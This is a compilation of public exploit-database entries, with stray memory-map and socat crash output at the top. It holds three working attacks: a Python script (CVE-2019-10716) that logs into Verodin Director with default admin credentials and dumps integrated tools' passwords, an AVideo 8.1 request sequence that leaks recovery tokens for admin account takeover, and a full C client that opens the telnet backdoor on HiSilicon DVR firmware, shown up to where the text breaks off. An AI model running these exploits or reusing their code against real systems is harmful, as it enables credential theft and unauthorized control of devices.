7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787
/lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909
/lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763
/lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619
/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620
/lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944
/lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917
/lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735
/lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0
[stack]
7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0
[vvar]
7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0
[vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
[vsyscall]
2020/02/04 05:33:00 socat[47233] E exiting on signal 6
# Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)
# Discovery Date: 2019-01-31
# Exploit Author: Nolan B. Kennedy (nxkennedy)
# Vendor Homepage: https://www.verodin.com/
# Software Link : https://www.verodin.com/demo-request/demo-request-form
# Tested Versions: v3.5.1.0, v3.5.2.0, v3.5.3.1
# Tested On: Windows
# CVE: CVE-2019-10716
# Vulnerability Type: Sensitive Data Disclosure
###
# Description: Verodin Director's REST API allows authenticated users to query the configuration
# details, which include credentials, of any 50+ possible integrated security tools (e.g. Splunk, ArcSight, Palo Alto, AWS Cloud Trail).
# Fortunately for attackers, members of 3 out of the 4 user groups in the Director can query this info (Users, Power Users, System Admin).
#
# API Request: GET https://<director-ip>/integrations.json
#
# Usage: python3 script.py
#
# Example Output:
#
# -- VERODIN DIRECTOR WEB CONSOLE < V3.5.4.0 - REMOTE AUTHENTICATED PASSWORD DISCLOSURE (POC) --
# -- Author: Nolan B. Kennedy (nxkennedy) --
#
#
# [+] Director Version
# =====================
# [*] Detected version 3.5.1.0 is VULNERABLE! :)
#
#
# [+] Account Permissions
# ========================
# [*] "admin@verodin.com" is a member of "System Admin"
#
#
# [+] Verodin Integrations
# =========================
# [*] Product: splunk
# [*] Username: splunk_svc_acct
# [*] Misc (may include credentials): [{'scheme': 'https', 'basic': False, 'password': 'Sup3rP@ssw0rd',
# 'port': 8089, 'host': '10.0.0.6', 'username': 'splunk_svc_acct'},
# {'proxy_hash': None}]
#
# [*] Product: arcsight
# [*] Username: arcsight_admin
# [*] Misc (may include credentials): ['10.0.0.7', 8443, 'https', 'arcsight_admin', 'Sup3rP@ssw0rd',
# "/All Filters/Personal/integration_user's filters/Verodin Filter", 'Verodin Query Viewer', 60]
#
# [+] Done!
###
import base64
from distutils.version import LooseVersion
import json
import re
import ssl
from sys import exit
from time import sleep
import urllib.request
verodin_ip = '0.0.0.0'
# Default System Admin creds. Worth a try.
username = 'admin@verodin.com'
password = 'Ver0d!nP@$$'
base_url = 'https://{}'.format(verodin_ip)
fixed_version = '3.5.4.0'
# We'll be making 3 different requests so we need a web handling function
def requests(target, html=False):
url = base_url + target
context = ssl._create_unverified_context() # so we don't get an ssl cert error
req = urllib.request.Request(url)
credentials = ('{}:{}'.format(username, password))
encoded_credentials = base64.b64encode(credentials.encode('ascii'))
req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) # use %s instead of format because errors
r = urllib.request.urlopen(req, context=context)
content = r.read().decode('utf-8')
if r.getcode() == 200:
# we don't always get a 401 if auth fails
if 'Cookies need to be enabled' in content:
print('[!] Failed to retrieve data: Credentials incorrect/invalid')
print()
print('[!] Exiting...')
exit(1)
elif html:
blob = content
else:
blob = json.loads(content)
return blob
elif r.getcode() == 401:
print('[!] Failed to retrieve data: Credentials incorrect/invalid')
print()
print('[!] Exiting...')
exit(1)
else:
print('[!] ERROR: Status Code {}'.format(r.getcode()))
exit(1)
# Do we have permissions to retrieve the creds?
def getUserPerms():
target = '/users/user_prefs.json'
r = requests(target) # returns a single json dict
print('\n[+] Account Permissions')
print('========================')
group_id = r['user_group_id']
roles = {'Reporting': 4, 'Users': 3, 'Power Users': 2, 'System Admin': 1}
for role,value in roles.items():
if group_id == value:
print('[*] "{}" is a member of "{}"'.format(username, role))
print()
if group_id == 4:
print('[!] This account does not have sufficient privs. You need "Users" or higher.')
print()
print('[!] Exiting...')
exit(1)
sleep(0.5)
# We need to verify the target Director is running a vulnerable version
def checkVuln():
target = '/settings/system'
r = requests(target, html=True)
field = re.search(r'Director\sVersion:.*', r)
version = field.group().split('<')[0].split(" ")[2]
print('\n[+] Director Version')
print('=====================')
if LooseVersion(version) < LooseVersion(fixed_version):
print('[*] Detected version {} is VULNERABLE! :)'.format(version))
print()
else:
print('[!] Detected version {} is not vulnerable. Must be < {}'.format(version, fixed_version))
print()
print('[!] Exiting...')
sleep(0.5)
# Where we parse out any creds or other useful info
def getLoot():
target = '/integrations.json'
r = requests(target) # a list of json dicts
print('\n[+] Verodin Integrations')
print('=========================')
if not r:
print('[+] Dang! No integrations configured in this Director :(')
print()
else:
for integration in r:
product = integration['package_name'] # constant key
misc = integration.get('new_client_args') # we use .get to return a None type if the key doesn't exist
user = integration.get('username')
passw = integration.get('password')
token = integration.get('auth_token')
print('[*] Product: {}'.format(product))
if user:
print('[*] Username: {}'.format(user))
if passw:
print('[*] Password: {}'.format(passw))
if token and token is not 'null':
print('[*] Auth Token: {}'.format(token))
if misc:
print('[*] Misc (may include credentials): {}'.format(misc))
print()
sleep(0.5)
def main():
print('\n-- Verodin Director Web Console < v3.5.4.0 - Remote Authenticated Password Disclosure (PoC) --'.upper())
print('-- Author: Nolan B. Kennedy (nxkennedy) --')
print()
checkVuln()
getUserPerms()
getLoot()
print('[+] Done!')
if __name__ == '__main__':
main()
# Exploit Title: AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
#
................
0
id 92
user "admin"
name "Watch Later"
email "user@localhost"
password "bc79a173cc20f0897db1c5b004588db9"
created "2019-05-16 21:42:42"
modified "2019-05-16 21:42:42"
isAdmin 1
status "watch_later"
photoURL "videos/userPhoto/photo1.png"
lastLogin "2020-02-03 08:11:08"
recoverPass "0ce70c7b006c78552fee993adeaafadf"
................
#
# Password recovery can be done using recoverPass.
# http://localhost/[PATH]/recoverPass?user=admin&recoverpass=0ce70c7b006c78552fee993adeaafadf
#
# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account
# Dork: N/A
# Date: 2020-02-03
# Exploit Author: Snawoot
# Vendor Homepage: http://www.hisilicon.com
# Product Link: http://www.hisilicon.com/en/Products
# Version: hi3520d
# Tested on: Linux
# CVE: N/A
# References: https://habr.com/en/post/486856/
# References: https://github.com/Snawoot/hisilicon-dvr-telnet
# References: https://github.com/tothi/pwn-hisilicon-dvr#summary
# POC:
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
typedef unsigned char byte;
typedef unsigned int uint;
byte state[2048] = {0};
byte datum[] = {
0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,
0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,
0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,
0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,
0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,
0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,
0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,
0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,
0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,
0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,
0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,
0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,
0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,
0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,
0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,
0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,
0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,
0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,
0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,
0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,
0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,
0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,
0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,
0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,
0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,
0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,
0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,
0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,
0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,
0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,
0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,
0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,
0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,
0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,
0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,
0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,
0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,
0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,
0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,
0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,
0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,
0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,
0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,
0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,
0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,
0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,
0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,
0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,
0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,
0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,
0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,
0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,
0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,
0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,
0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,
0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,
0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,
0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,
0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,
0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,
0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,
0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,
0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,
0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,
0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,
0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,
0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,
0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,
0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,
0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20
};
void init_cipher_offset_vector(byte *dst,byte *src,int size)
{
int i;
i = 0;
while (i < size) {
dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;
i = i + 1;
}
return;
}
void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)
{
int i;
i = 0;
while (i < (int)size) {
state[i] = src[(uint)offset_vector[i] - 1];
i = i + 1;
}
memcpy(dst,state,size);
return;
}
void cipher_memcpy_shuffle(void *dst,size_t size)
{
memcpy(state,dst,size);
memcpy(dst,(void *)(dst + size),0x1c - size);
memcpy((void *)(dst + (0x1c - size)),state,size);
return;
}
void init_cipher_state(void *dst,void *src)
{
byte current_byte;
int i;
init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);
apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);
i = 0;
do {
current_byte = (datum + 0x310)[i];
i = i + 1;
cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);
cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);
apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);
dst = (byte *)dst + 0x30;
} while (i != 0x10);
return;
}
void cipher_xor(byte *data,byte *key,int size)
{
int i;
i = 0;
while (i < size) {
data[i] = key[i] ^ data[i];
i = i + 1;
}
return;
}
void prepare_key(void *key,size_t key_size)
{
size_t __n;
memset(state + 0x1d0,0,0x10);
__n = key_size;
if (0xf < (int)key_size) {
__n = 0x10;
}
memcpy(state + 0x1d0,key,__n);
init_cipher_state(state + 0x1e0,state + 0x1d0);
if (8 < (int)key_size) {
init_cipher_state(state + 0x4e0,state + 0x1d8);
}
*(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size
return;
}
void cipher_shuffle(byte *dst,byte *src)
{
byte *caretPtr;
int iVar1;
byte *ptr;
int i;
apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);
cipher_xor(state + 0x100,src,0x30);
ptr = state + 0x100;
i = 0;
do {
iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;
caretPtr = dst + i;
i = i + 4;
init_cipher_offset_vector
(caretPtr,datum + 0x30 +
(uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +
iVar1 * 0x10,4);
ptr = ptr + 6;
} while (i != 0x20);
apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);
return;
}
void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)
{
uint i;
byte *backward_ov_ptr;
byte *forward_ov_ptr;
int iVar3;
init_cipher_offset_vector(state + 0x130,data,0x40);
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);
if (direction == 0) {
forward_ov_ptr = offset_vector + 0x300;
do {
memcpy(state + 0x170,state + 0x150,0x20);
cipher_shuffle(state + 0x150,offset_vector);
cipher_xor(state + 0x150,state + 0x130,0x20);
memcpy(state + 0x130, state + 0x170, 0x20);
offset_vector = offset_vector + 0x30;
} while (offset_vector != forward_ov_ptr);
}
else {
backward_ov_ptr = offset_vector + 0x2d0;
do {
memcpy(state + 0x170,state + 0x130,0x20);
cipher_shuffle(state + 0x130,backward_ov_ptr);
cipher_xor(state + 0x130,state + 0x150,0x20);
backward_ov_ptr -= 0x30;
memcpy(state + 0x150,state + 0x170,0x20);
} while (backward_ov_ptr != offset_vector + -0x30);
}
apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);
memset(result,0,8);
i = 0;
do {
result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);
i = i + 1;
} while (i != 0x40);
return;
}
int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)
{
uint short_key_iter;
int curBlockNumber;
int blockCount;
if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))
&& ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_len);
blockCount = (int)(data_len + 7) >> 3;
short_key_iter = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)short_key_iter < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
short_key_iter = short_key_iter + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (curBlockNumber < blockCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);
curBlockNumber = curBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)
{
uint uVar2;
int currentBlockNumber;
int blocksCount;
if (((result != (char *)0x0 && data != (char *)0x0) &&
(currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {
prepare_key(key,key_size);
blocksCount = (int)(data_len + 7) >> 3;
uVar2 = *(state + 0x7e0);
if (*(state + 0x7e0) == 0) {
while ((int)uVar2 < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
uVar2 = uVar2 + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
else {
while (currentBlockNumber < blocksCount) {
cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);
cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);
cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);
currentBlockNumber = currentBlockNumber + 1;
result = (char *)((byte *)result + 8);
data = (char *)((byte *)data + 8);
}
}
return 0;
}
return -1;
}
void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)
{
unsigned char * pin = in;
const char * hex = "0123456789ABCDEF";
char * pout = out;
for(; pin < in+insz; pout +=3, pin++){
pout[0] = hex[(*pin>>4) & 0xF];
pout[1] = hex[ *pin & 0xF];
pout[2] = ':';
if (pout + 3 - out > outsz){
/* Better to truncate output string than overflow buffer */
/* it would be still better to either return a status */
/* or ensure the target buffer is large enough and it never happen */
break;
}
}
pout[-1] = 0;
}
char netbuf[4096];
#define PADDED(X) (((X + 7) / 8) * 8)
#define PORT 9530
#define BUFSIZE sizeof(netbuf)
#define CMD_FIRST "OpenTelnet:OpenOnce"
#define CHALLENGE_PROLOGUE "randNum:"
#define VERIFY_OK "verify:OK"
#define CMD_FINAL "CMD:"
#define FINAL_PAYLOAD "Telnet:OpenOnce"
#define OPEN_OK "Open:OK"
ssize_t send_str(int sockfd, char *str, size_t len) {
if (len > 0xFE) {
return -1;
}
char buf[len+1];
buf[0] = len + 1;
memcpy(buf + 1, str, len);
return send(sockfd, buf, len + 1, 0);
}
int main(int argc, char* argv[]) {
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if (argc != 3) {
fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);
return 2;
}
if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
herror("gethostbyname");
return 1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
}
their_addr.sin_family = AF_INET; /* host byte order */
their_addr.sin_port = htons(PORT); /* short, network byte order */
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8); /* zero the rest of the struct */
if (connect(sockfd, (struct sockaddr *)&their_addr, \
sizeof(struct sockaddr)) == -1) {
perror("connect");
return 1;
}
if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {
perror("send");
return 1;
}
printf("Sent %s command.\n", CMD_FIRST);
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {
fprintf(stderr, "No challenge received.\n");
return 3;
}
char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;
char challengeStr[strlen(seed) + strlen(argv[2]) + 1];
size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);
printf("challenge=%s\n", challengeStr);
char encryptedRandomSeed[PADDED(challengeLen)];
encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);
memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);
memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));
if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {
fprintf(stderr, "Verification failed.\n");
return 4;
}
char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];
encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);
memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);
memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));
if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {
perror("send");
return 1;
}
bzero(netbuf, BUFSIZE);
if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {
perror("recv");
return 1;
}
puts(netbuf);
